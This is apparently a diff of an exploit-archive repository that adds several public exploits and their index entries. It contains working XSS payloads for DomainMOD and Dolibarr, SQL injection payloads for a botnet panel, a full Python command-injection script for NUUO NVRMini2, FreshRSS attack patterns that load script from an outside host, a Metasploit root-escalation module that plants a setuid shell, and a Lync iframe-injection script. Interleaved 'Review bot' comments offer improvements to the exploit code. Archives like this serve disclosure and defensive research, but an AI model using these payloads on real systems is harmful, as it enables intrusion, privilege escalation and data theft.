Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==35788==ABORTING
--- cut ---
The crash was reported at https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=15279. Attached are three files which trigger the crash.
Proof of Concept:
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/45951.zip


@ -0,0 +1,18 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19749
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/81
After logging into the Domainmod application panel, browse to the
assets/add/account-owner.php page and inject a javascript XSS payload
in owner name field
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/81


@ -0,0 +1,50 @@
################################
# Exploit Title: KeyBase Botnet v1.5 - SQL Injection Vulnerability
# Google Dork: intitle:"KeyBase: Login" + intext:"( Login to get access to your logs )"
# Date: 3/12/2018
# Exploit Author: n4pst3r
# Vendor Homepage: unkn0wn
# Software Link: unkn0wn
# Version: v1.5
# Tested on: Windows 10, debian 7
# CVE : n/a
################################
# Vuln-Code: post.php - variant "keystrokes, passwords, clipboard" & "machinename, machinetime"
if ($_GET['type'] == 'keystrokes')
{
$sqlk = "CREATE TABLE if not exists Keystrokes (id INT(6) UNSIGNED AUTO_INCREMENT PRIMARY KEY, machinename VARCHAR(255) NOT NULL, windowtitle VARCHAR(255) NOT NULL,
keystrokestyped VARCHAR(255), machinetime VARCHAR(255) NOT NULL, ipaddress VARCHAR(255) NOT NULL, date TIMESTAMP)";
if ($conn->query($sqlk) === TRUE) {
$sqlinsertk ="INSERT INTO Keystrokes (id, machinename, windowtitle, keystrokestyped, machinetime, ipaddress, date) VALUES (NULL, '$machinename', '$windowtitle', '$keystrokestyped', '$machinetime', '$ipaddress', '$date')";
if ($conn->query($sqlinsertk) === TRUE) {
echo "<br>Success";
}else{
echo "<br>Error:" . $conn->error;
} } else {
echo "<br>Error:" . $conn->error;
}
################################
PoC:
http://127.0.0.1/post.php?type=keystrokes&machinename=[SQLi]1&machinetime=[SQLi]
################################
Response:
GET parameter 'machinename' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 410 HTTP(s) requests:
---
Parameter: machinename (GET)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: type=keystrokes&machinename=1' RLIKE (SELECT (CASE WHEN (6432=6432) THEN 1 ELSE 0x28 END)) AND 'CbAF'='CbAF&machinetime=1
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: type=keystrokes&machinename=1' AND (SELECT 9909 FROM(SELECT COUNT(*),CONCAT(0x717a7a6b71,(SELECT (ELT(9909=9909,1))),0x716a786a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'gwid'='gwid&machinetime=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: type=keystrokes&machinename=1' AND SLEEP(5) AND 'MWry'='MWry&machinetime=1


@ -0,0 +1,20 @@
# Exploit Title: Dolibarr ERP/CRM <= 8.0.3 - Cross-Site Scripting
# CVE: CVE-2018-19799
# Date: 2018-11-23
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Contact: https://pentest.com.tr
# Vendor Homepage: https://dolibarr.org
# Software Link: http://sourceforge.net/projects/dolibarr/files/
# Version: v8.0.3
# Category: Webapps
# Tested on: XAMPP for Linux 7.2.8-0
# Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business.
# (customers, invoices, orders, products, stocks, agenda, e-mailings, shipments...)
# Description : Exploiting these issues could allow an attacker to steal cookie-based authentication credentials,
# compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
# Dolibarr 8.0.3 is vulnerable; prior versions may also be affected.
# ==================================================================
# PoC:
# GET Request : /exports/export.php?step=2&datatoexport=[XSS PAYLOAD]&action=selectfield&field=pj.ref&page_y=627


@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/domainmod/domainmod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19750
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/82)
# After logging into the Domainmod application panel, browse to the /admin/domain-fields page, Click Add custom field, and inject a javascript XSS payload in Display Name, Description & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/82


@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19751
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01https://github.com/domainmod/domainmod/issues/83)
# After logging into the Domainmod application panel, browse to the /admin/ssl-fields/add.php page and inject a javascript XSS payload in Display Name, Description & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/83

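--- a/exploits/php/webapps/45948.py
+++ b/exploits/php/webapps/45948.py
@@ -0,0 +1,110 @@
+# Exploit Title: NUUO NVRMini2 Authenticated Command Injection
+# Date: December 3, 2018
+# Exploit Author: Artem Metla
+# Vendor Homepage: https://www.nuuo.com/ProductNode.php?node=2#
+# Version: 3.9.1
+# Tested on: NUUO NVRMini2 with firmware 3.9.1
+# CVE : CVE-2018-15716
+# Advisory: https://www.tenable.com/security/research/tra-2018-41
+import argparse
+import requests
+import urllib.parse
+import binascii
+import http.cookiejar as cookielib
+import re
+def run(target, username, password, command):
+""" Authenticate us and execute exploitation """
+# Step 1. Authentication
+payload = {'language':'en', 'user':username, 'pass':password,
+'submit':'Login'}
+r = requests.post(urllib.parse.urljoin(target, 'login.php'),
+data=payload, verify=False, allow_redirects=False)
+jar = r.cookies
+# Step 2. Prepare a payload
+# We're bypassing 2 filters:
+# 1) Instead of using ";" we can try || or &&, to bypass:
+# if(strpos($uploaddir, ';') !== false)
+# {
+# die('[1]Not a valid path.');
+# }
+# 2) To bypass this:
+# $cmd = "sed -i 's/".str_replace('/', '\/',
+$current_dir)."/".str_replace('/', '\/', $tmp_upload_dir)."/g'
+".PHP_CINF_PATH;
+# we have to HEX encode a payload
+#
+# Simple example of payload that we're trying to achieve: '||ls`echo
+-e "\\x20\\x2f"`||' to execue: ls /
+# 3) Multiple parameters commands are not supported yet, but the same
+techique could be used for them
+# Primitive Bash command parser
+splitted_command = [command]
+for i in range(0, len(command)-1):
+if command[i] == " " and command[i+1] != "-":
+splitted_command = [command[:i], command[i+1:]]
+break
+# Encoding a payload
+if len(splitted_command) == 2:
+payload = "".join('\\\\x%s' %
+binascii.hexlify(char.encode('ascii')).decode("utf-8") for char in
+splitted_command[1])
+exploit = '\'||%s `echo -e "%s"`||\'' % (splitted_command[0],
+payload)
+print("Exploit: %s" % exploit)
+else:
+exploit = '\'||%s||\'' % (splitted_command[0])
+print("Exploit: %s" % exploit)
+# Step 3. Send a payload
+payload = {'cmd':'writeuploaddir', 'uploaddir':exploit}
+r = requests.get(urllib.parse.urljoin(target, 'upgrade_handle.php'),
+params=payload, verify=False, cookies=jar)
+# Step 4. Output processing to grab only needed output
+res = re.search('upload_tmp_dir=([^<>]*)<br />', str(r.content))
+if res:
+print(res.group(1).replace('\\n', '\n'))
+def main():
+""" Parse command line arguments and start exploit """
+parser = argparse.ArgumentParser(
+add_help=False,
+formatter_class=argparse.RawDescriptionHelpFormatter,
+epilog="Examples: %(prog)s -t http://192.168.0.1/ -u username
+-p password -c whoami")
+# Adds arguments to help menu
+parser.add_argument("-h", action="help", help="Print this help message
+then exit")
+parser.add_argument("-t", dest="target", required="yes", help="Target
+URL address like: https://localhost:443/")
+parser.add_argument("-u", dest="username", required="yes",
+help="Username to authenticate")
+parser.add_argument("-p", dest="password", required="yes",
+help="Password to authenticate")
+parser.add_argument("-c", dest="command", required="yes", help="Shell
+command to execute")
+# Assigns the arguments to various variables
+args = parser.parse_args()
+run(args.target, args.username, args.password, args.command)
+#
+# Main
+#
+if __name__ == "__main__":
+main()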
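Review bot: The four `add_argument` calls in `main` pass `required="yes"`; argparse only tests that value for truthiness, so it works, but it reads as if the parser expected a literal answer and the documented form is `required=True`. In `run`, the output is matched with `re.search(..., str(r.content))`, which runs the regex over the `b'...'` repr of the body and is the reason the later `.replace('\\n', '\n')` is needed; matching on `r.text` would give the decoded body directly. The unused `import http.cookiejar as cookielib` can also be dropped.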


@ -0,0 +1,15 @@
# Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting
# Date: 2018-11-22
# Exploit Author: Mohammed Abdul Raheem
# Vendor Homepage: domainmod (https://domainmod.org/)
# Software Link: domainmod (https://github.com/DomainMod/DomainMod)
# Version: v4.09.03 to v4.11.01
# CVE : CVE-2018-19752
# A Stored Cross-site scripting (XSS) was discovered in DomainMod application
# versions from v4.09.03 to v4.11.01
# After logging into the Domainmod application panel, browse to the /assets/add/registrar-account.php page and inject a javascript XSS payload in registrar Name, registrar url & Notes fields
"><img src=x onerror=alert("Xss-By-Abdul-Raheem")>
#POC : attached here https://github.com/domainmod/domainmod/issues/84


@ -0,0 +1,68 @@
Multiple Cross-Site Scripting Vulnerabilities in FreshRSS 1.11.1
Information
--------------------
Advisory by Netsparker
Name: Multiple Cross-Site Scripting Vulnerabilities in FreshRSS
Affected Software: FreshRSS
Affected Versions: 1.11.1
Homepage: https://freshrss.org/
Vulnerability: Cross-site Scripting
Severity: Medium
Status: Fixed
CVE-ID : CVE-2018-19782
CVSS Score (3.0): 6.3
Netsparker Advisory Reference: NS-18-024
Technical Details
--------------------
Blind Cross-site Scripting
URL : http://ns.app:8085/i/?c=auth&a='"--></style></scRipt><scRipt src="//4cipl0hyi5btaxbj3ovzc7b6e6eckgescau78dxgsho.r87.me"></scRipt> Parameter Name : a
Parameter Type : GET
Attack Pattern : %27%22--%3e%3c%2fstyle%3e%3c%2fscRipt%3e%3cscRipt+src%3d%22%2f%2f4cipl0hyi5btaxbj3ovzc7b6e6eckgescau78dxgsho%26%2346%3br87%26%2346%3bme%22%3e%3c%2fscRipt%3e
Stored Cross-site Scripting
URL : http://ns.app:8085/i/?c=error
Injection URL : http://ns.app:8085/i/?c=error
Parameter Name : a
Parameter Type : GET
Attack Pattern : '"--></style></scRipt><scRipt>netsparker(0x00139F)</scRipt>
Cross-site Scripting
URL : http://ns.app:8085/i/?c=error
Proof URL : http://ns.app:8085/i/?c=error
Injection URL : http://ns.app:8085/i/?c=%3ciMg%20src%3dN%20onerror%3dnetsparker(0x001DCF)%3e&a=actualize&id=-1
Parameter Name : c
Parameter Type : GET
Attack Pattern : %3ciMg+src%3dN+onerror%3dnetsparker(0x001DCF)%3e
URL : http://ns.app:8085/i/?c=error
Proof URL : http://ns.app:8085/i/?c=error
Injection URL : http://ns.app:8085/i/?a=%3ciMg%20src%3dN%20onerror%3dnetsparker(0x001F6B)%3e&get=s&order=ASC
Parameter Name : a
Parameter Type : GET
Attack Pattern : %3ciMg+src%3dN+onerror%3dnetsparker(0x001F6B)%3e
For more information on cross-site scripting vulnerabilities read the article Cross-site Scripting (XSS).
Advisory Timeline
--------------------
12th November 2018- First Contact
28th November 2018 - Vendor Fixed
3rd December 2018 - Advisory Released
Credits & Authors
--------------------
These issues have been discovered by Omar Kurt while testing Netsparker Web Application Security Scanner.
About Netsparker
--------------------
Netsparker web application security scanners find and report security flaws and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications, regardless of the platform and technology they are built on. Netsparker scanning engineas unique detection and exploitation techniques allow it to be dead accurate in reporting vulnerabilities. The Netsparker web application security scanner is available in two editions; Netsparker Desktop and Netsparker Cloud. Visit our website https://www.netsparker.com for more information.

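--- a/exploits/unix/local/45953.rb
+++ b/exploits/unix/local/45953.rb
@@ -0,0 +1,163 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+class MetasploitModule < Msf::Exploit::Local
+Rank = ExcellentRanking
+include Msf::Post::File
+def initialize(info = {})
+super(update_info(info,
+'Name' => 'Emacs movemail Privilege Escalation',
+'Description' => %q{
+This module exploits a SUID installation of the Emacs movemail utility
+to run a command as root by writing to 4.3BSD's /usr/lib/crontab.local.
+The vulnerability is documented in Cliff Stoll's book The Cuckoo's Egg.
+},
+'Author' => [
+'Markus Hess', # Discovery? atrun(8) exploit for sure
+'Cliff Stoll', # The Cuckoo's Egg hacker tracker
+'wvu' # Module and additional research
+],
+'References' => [
+%w[URL https://en.wikipedia.org/wiki/Movemail],
+%w[URL https://en.wikipedia.org/wiki/The_Cuckoo%27s_Egg],
+%w[URL http://pdf.textfiles.com/academics/wilyhacker.pdf],
+%w[URL https://www.gnu.org/software/emacs/manual/html_node/efaq/Security-risks-with-Emacs.html],
+%w[URL https://www.gnu.org/software/emacs/manual/html_node/emacs/Movemail.html],
+%w[URL https://mailutils.org/manual/html_node/movemail.html]
+],
+'DisclosureDate' => '1986-08-01', # Day unknown, assuming first of month
+'License' => MSF_LICENSE,
+'Platform' => 'unix',
+'Arch' => ARCH_CMD,
+'SessionTypes' => %w[shell],
+'Privileged' => true,
+'Payload' => {'BadChars' => "\n", 'Encoder' => 'generic/none'},
+'Targets' => [['/usr/lib/crontab.local', {}]],
+'DefaultTarget' => 0,
+'DefaultOptions' => {
+'PAYLOAD' => 'cmd/unix/generic',
+'CMD' => 'cp /bin/sh /tmp && chmod u+s /tmp/sh'
+}
+))
+register_options([
+OptString.new('MOVEMAIL', [true, 'Path to movemail', '/etc/movemail'])
+])
+register_advanced_options([
+OptBool.new('ForceExploit', [false, 'Override check result', false])
+])
+end
+def bin_path
+'/bin:/usr/bin:/usr/ucb:/etc'
+end
+def movemail
+datastore['MOVEMAIL']
+end
+def crontab_local
+'/usr/lib/crontab.local'
+end
+def crontab(cmd)
+"* * * * * root #{cmd}\n* * * * * root rm -f #{crontab_local}"
+end
+# uname(1) does not exist, technique from /etc/rc.local
+def is_43bsd?
+cmd_exec('strings /vmunix | grep UNIX').include?('4.3 BSD')
+end
+# id(1) does not exist
+def is_root?
+cmd_exec('whoami').include?('root')
+end
+# test -u does not exist
+def setuid_root?(path)
+cmd_exec("find #{path} -user root -perm -4000 -print").include?(path)
+end
+def setup
+super
+vprint_status("Setting a sane $PATH: #{bin_path}")
+case cmd_exec('echo $SHELL')
+when %r{/bin/sh}
+vprint_status('Current shell is /bin/sh')
+cmd_exec("PATH=#{bin_path}; export PATH")
+when %r{/bin/csh}
+vprint_status('Current shell is /bin/csh')
+cmd_exec("setenv PATH #{bin_path}")
+else
+vprint_bad('Current shell is unknown')
+end
+vprint_status("$PATH is #{cmd_exec('echo $PATH').chomp}")
+end
+def check
+unless is_43bsd?
+vprint_warning('System does not appear to be 4.3BSD')
+end
+unless file?(movemail)
+vprint_bad("#{movemail} not found")
+return CheckCode::Safe
+end
+unless movemail.end_with?('movemail')
+vprint_warning("#{movemail} has an unexpected name")
+end
+unless setuid_root?(movemail)
+vprint_status("Non-SUID-root #{movemail} found")
+return CheckCode::Detected
+end
+vprint_good("SUID-root #{movemail} found")
+CheckCode::Appears
+end
+def exploit
+if is_root?
+print_good('Session is already root, executing payload directly')
+return cmd_exec(payload.encoded)
+end
+unless check == CheckCode::Appears || datastore['ForceExploit']
+fail_with(Failure::NotVulnerable, 'Set ForceExploit to override')
+end
+# outdesc = open (outname, O_WRONLY | O_CREAT | O_EXCL, 0666);
+if file?(crontab_local)
+fail_with(Failure::NoTarget, "#{crontab_local} already exists")
+end
+print_status('Preparing crontab with payload')
+tab = crontab(payload.encoded)
+vprint_line(tab)
+# umask (umask (0) & 0333);
+# (void) ftruncate (indesc, 0L);
+print_status("Creating writable #{crontab_local}")
+cmd_exec("(umask 0 && #{movemail} /dev/null #{crontab_local})")
+unless writable?(crontab_local)
+fail_with(Failure::NoAccess, "#{crontab_local} is not writable")
+end
+print_good("Writing crontab to #{crontab_local}")
+cmd_exec("echo '#{tab.gsub("'", "'\\\\''")}' > #{crontab_local}")
+print_warning('Please wait at least one minute for effect')
+end
+end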
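Review bot: `setuid_root?` interpolates `path` unquoted into `find #{path} -user root -perm -4000 -print`, and `exploit` does the same with `movemail` in the `umask 0 && #{movemail} ...` line, so a `MOVEMAIL` value containing whitespace or shell metacharacters silently changes the command; wrapping the option with `Shellwords.escape` at both sites keeps it a single argument. `check` only warns when `is_43bsd?` is false and still returns `CheckCode::Appears` for any SUID-root binary, which looks intentional given `ForceExploit`, but a comment such as `# non-4.3BSD hosts are reported, not rejected; crontab.local is a 4.3BSD mechanism` would say so. There is no `cleanup` method: removal of `crontab_local` rests entirely on the second line written by `crontab`, so if cron never runs the file created with `umask 0` (mode 0666 per the quoted `open` call) remains on the host.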


@ -0,0 +1,91 @@
# Exploit Title: Microsoft Lync for Mac 2011 Injection Forced Browsing/Download
# Author: @nyxgeek - TrustedSec
# Date: 2018-03-20
# Vendor Homepage: microsoft.com
# Software Link: https://www.microsoft.com/en-us/download/details.aspx?id=36517
# CVE: CVE-2018-8474
# Version: Lync:Mac 2011 14.4.3, likely earlier versions
# Tested on: Lync:Mac 2011 14.4.3 (170308)
# Description:
# Force browsing or download via embedded iframe in a chat window. No user
# interaction required. When the iframe contains a web site URL, a new browser
# window of the default browser will open with the URL.
# If the URL is a file, it will download it automatically if it is a permitted
# file type (e.g., zip)
# A write-up can be found at:
# https://www.trustedsec.com/2018/09/full-disclosure-microsoft-lync-for-mac-2011-susceptible-to-forced-browsing-download-attack/
# Requirements: Originating machine needs Lync 2013 SDK installed
# (https://www.microsoft.com/en-us/download/details.aspx?id=36824)
# Timeline of Disclosure:
#
# 07/18/2017 - Reported issue to Microsoft
# 11/22/2017 - Microsoft has reproduced problem
# 03/07/2018 - Microsoft replies that they have decided not to fix, but gave
# their blessing for disclosure
#target user
$target = "user@domain"
$message = "<iframe src='https://www.youtube.com/watch?v=9Rnr70wCQSA'></iframe>"
if (-not (Get-Module -Name Microsoft.Lync.Model))
{
try
{
# you may need to change the location of this DLL
Import-Module "C:\Program Files\Microsoft Office\Office15\LyncSDK\Assemblies\Desktop\Microsoft.Lync.Model.dll" -ErrorAction Stop
}
catch
{
Write-Warning "Microsoft.Lync.Model not available, download and install the Lync 2013 SDK http://www.microsoft.com/en-us/download/details.aspx?id=36824"
}
}
# Connect to the local Skype process
try
{
$client = [Microsoft.Lync.Model.LyncClient]::GetClient()
}
catch
{
Write-Host "`nYou need to have Skype open and signed in first"
break
}
#Start Conversation
$msg = New-Object "System.Collections.Generic.Dictionary[Microsoft.Lync.Model.Conversation.InstantMessageContentType, String]"
#Add the Message
$msg.Add(1,$message)
# Add the contact URI
try
{
$contact = $client.ContactManager.GetContactByUri($target)
}
catch
{
Write-Host "`nFailed to lookup Contact"$target
break
}
# Create a conversation
$convo = $client.ConversationManager.AddConversation()
$convo.AddParticipant($contact) | Out-Null
# Set the message mode as IM
$imModality = $convo.Modalities[1]
# Send the message
$imModality.BeginSendMessage($msg, $null, $imModality) | Out-Null
# End the Convo to suppress the UI
$convo.End() | Out-Null
Write-Host "Sent the following message to "$target":`n"$message
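Review bot: The first `catch` after `Import-Module ... Microsoft.Lync.Model.dll` only writes a warning and lets the script continue, so with the SDK absent execution reaches `[Microsoft.Lync.Model.LyncClient]::GetClient()` and dies with a type-not-found error instead of the message just printed; the two later `catch` blocks stop, and this one should too, e.g. `Write-Warning "..."; return`. Stopping with `break` at script scope is itself questionable: outside a loop it propagates upward and can terminate a calling script, whereas `return` or `exit 1` states the intent. The hard-coded `Office15` DLL path is flagged by the comment above it but would be clearer as a `param()` with that value as the default.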

154
exploits/windows/remote/45952.rb Executable file



@ -6204,6 +6204,9 @@ id,file,description,date,author,type,platform,port
45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows, 45924,exploits/windows/dos/45924.html,"VBScript - 'rtFilter' Out-of-Bounds Read",2018-11-30,"Google Security Research",dos,windows,
45931,exploits/windows/dos/45931.txt,"Mozilla Firefox 63.0.1 - Denial of Service (PoC)",2018-12-03,"SAIKUMAR CHEBROLU",dos,windows, 45931,exploits/windows/dos/45931.txt,"Mozilla Firefox 63.0.1 - Denial of Service (PoC)",2018-12-03,"SAIKUMAR CHEBROLU",dos,windows,
45934,exploits/linux/dos/45934.txt,"Budabot 4.0 - Denial of Service (PoC)",2018-12-03,"Ryan Delaney",dos,linux, 45934,exploits/linux/dos/45934.txt,"Budabot 4.0 - Denial of Service (PoC)",2018-12-03,"Ryan Delaney",dos,linux,
45936,exploits/windows/dos/45936.ps1,"Microsoft Lync for Mac 2011 - Injection Forced Browsing/Download",2018-12-04,nyxgeek,dos,windows,
45950,exploits/multiple/dos/45950.txt,"Wireshark - 'cdma2k_message_ACTIVE_SET_RECORD_FIELDS' Stack Corruption",2018-12-04,"Google Security Research",dos,multiple,
45951,exploits/multiple/dos/45951.txt,"Wireshark - 'find_signature' Heap Out-of-Bounds Read",2018-12-04,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -10132,6 +10135,8 @@ id,file,description,date,author,type,platform,port
45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos, 45916,exploits/macos/local/45916.rb,"Mac OS X - libxpc MITM Privilege Escalation (Metasploit)",2018-11-29,Metasploit,local,macos,
45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows, 45921,exploits/windows/local/45921.rb,"HTML5 Video Player 1.2.5 - Buffer Overflow (Metasploit)",2018-11-30,d3ckx1,local,windows,
45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd, 45922,exploits/openbsd/local/45922.sh,"xorg-x11-server < 1.20.3 - 'modulepath' Local Privilege Escalation",2018-11-30,"Marco Ivaldi",local,openbsd,
45938,exploits/aix/local/45938.pl,"Xorg X11 Server (AIX) - Local Privilege Escalation",2018-12-04,0xdono,local,aix,
45953,exploits/unix/local/45953.rb,"Emacs - movemail Privilege Escalation (Metasploit)",2018-12-04,Metasploit,local,unix,
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -16987,6 +16992,8 @@ id,file,description,date,author,type,platform,port
45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple, 45917,exploits/multiple/remote/45917.rb,"TeamCity Agent - XML-RPC Command Execution (Metasploit)",2018-11-29,Metasploit,remote,multiple,
45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066 45925,exploits/java/remote/45925.rb,"Apache Spark - Unauthenticated Command Execution (Metasploit)",2018-11-30,Metasploit,remote,java,6066
45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858 45926,exploits/windows/remote/45926.py,"CyberArk 9.7 - Memory Disclosure",2018-12-03,"Thomas Zuk",remote,windows,1858
45939,exploits/linux/remote/45939.py,"OpenSSH < 7.7 - User Enumeration (2)",2018-12-04,"Leap Security",remote,linux,22
45952,exploits/windows/remote/45952.rb,"HP Intelligent Management - Java Deserialization RCE (Metasploit)",2018-12-04,Metasploit,remote,windows,8080
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -40436,3 +40443,13 @@ id,file,description,date,author,type,platform,port
45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80 45932,exploits/php/webapps/45932.txt,"PHP Server Monitor 3.3.1 - Cross-Site Request Forgery",2018-12-03,"Javier Olmedo",webapps,php,80
45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux, 45933,exploits/linux/webapps/45933.py,"Apache Superset 0.23 - Remote Code Execution",2018-12-03,"David May",webapps,linux,
45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80 45935,exploits/php/webapps/45935.txt,"Wordpress Plugins Advanced-Custom-Fields 5.7.7 - Cross-Site Scripting",2018-12-03,"Loading Kura Kura",webapps,php,80
45937,exploits/hardware/webapps/45937.txt,"Rockwell Automation Allen-Bradley PowerMonitor 1000 - Incorrect Access Control Authentication Bypass",2018-12-04,Luca.Chiou,webapps,hardware,80
45941,exploits/php/webapps/45941.txt,"DomainMOD 4.11.01 - Owner name Field Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45942,exploits/hardware/webapps/45942.py,"NEC Univerge Sv9100 WebPro - 6.00 - Predictable Session ID / Clear Text Password Storage",2018-12-04,hyp3rlinx,webapps,hardware,
45944,exploits/php/webapps/45944.txt,"KeyBase Botnet 1.5 - SQL Injection",2018-12-04,n4pst3r,webapps,php,
45945,exploits/php/webapps/45945.txt,"Dolibarr ERP/CRM 8.0.3 - Cross-Site Scripting",2018-12-04,AkkuS,webapps,php,80
45946,exploits/php/webapps/45946.txt,"DomainMOD 4.11.01 - Custom Domain Fields Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45947,exploits/php/webapps/45947.txt,"DomainMOD 4.11.01 - Custom SSL Fields Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45948,exploits/php/webapps/45948.py,"NUUO NVRMini2 3.9.1 - Authenticated Command Injection",2018-12-04,"Artem Metla",webapps,php,443
45949,exploits/php/webapps/45949.txt,"DomainMOD 4.11.01 - Registrar Cross-Site Scripting",2018-12-04,"Mohammed Abdul Raheem",webapps,php,80
45954,exploits/php/webapps/45954.txt,"FreshRSS 1.11.1 - Cross-Site Scripting",2018-12-04,Netsparker,webapps,php,80



@ -923,3 +923,5 @@ id,file,description,date,author,type,platform
